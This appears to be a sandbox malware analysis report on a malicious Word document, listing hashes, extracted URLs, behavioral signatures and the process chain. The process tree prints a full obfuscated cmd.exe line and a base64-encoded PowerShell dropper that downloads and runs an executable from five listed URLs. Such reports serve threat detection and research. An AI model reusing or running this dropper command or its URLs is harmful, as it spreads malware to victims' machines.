Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 10:53
Behavioral task
behavioral1
Sample
JHL_D_3392853_28_08_2018.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
JHL_D_3392853_28_08_2018.doc
Resource
win10v2004-20240226-en
General
-
Target
JHL_D_3392853_28_08_2018.doc
-
Size
83KB
-
MD5
e4625136904c387f83100ce9861b2e21
-
SHA1
3b29428a6cea904abd2903d5623fd7094914fec6
-
SHA256
8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c
-
SHA512
191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d
-
SSDEEP
1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4
Malware Config
Extracted
http://aliu-rdc.org/QwWKYJxM
http://2idiotsandnobusinessplan.com/wC7
http://7naturalessences.com/DFaSvtrS
http://benimdunyamkres.com/v0vig1G1
http://hostmktar.com/mP
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 524 3508 CMd.exe 89 -
Blocklisted process makes network request 1 IoCs
flow pid Process 50 4380 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 524 CMd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3508 WINWORD.EXE 3508 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4380 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3508 WINWORD.EXE 3508 WINWORD.EXE 3508 WINWORD.EXE 3508 WINWORD.EXE 3508 WINWORD.EXE 3508 WINWORD.EXE 3508 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3508 wrote to memory of 524 3508 WINWORD.EXE 97 PID 3508 wrote to memory of 524 3508 WINWORD.EXE 97 PID 524 wrote to memory of 4380 524 CMd.exe 105 PID 524 wrote to memory of 4380 524 CMd.exe 105
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SYSTEM32\CMd.exeCMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:3436
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5b8c6ad4b788e720c6b7b4fab70b81ad4
SHA1d0eba959434bd8dd359701789cf577b52f448be0
SHA256925d31f83e732cea00ab6bccd98966ca16496864f65936b187a908b822594a15
SHA512649a5d44c4307d2379c1c85352972c7013c7f720cec475b3e7a2a48ec513bb1c1bcd7a1021bd3c3fb46db2ab5dec0eddf9416ef92a63fb56dc586f5a897e5d6a